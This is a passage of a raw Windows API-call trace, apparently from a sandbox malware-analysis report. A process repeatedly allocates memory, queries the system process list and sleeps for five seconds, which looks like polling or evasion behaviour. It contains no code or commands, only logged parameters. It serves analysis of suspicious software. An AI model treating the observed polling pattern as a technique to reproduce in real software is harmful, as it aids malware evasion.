returned 0x0 [0262.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.921] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.930] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.937] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.945] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.953] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.960] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.967] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.975] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.982] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.989] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.998] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.005] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.014] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.024] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.054] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.070] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.080] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.090] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.100] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.110] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.114] NtQuerySystemInformation (in: 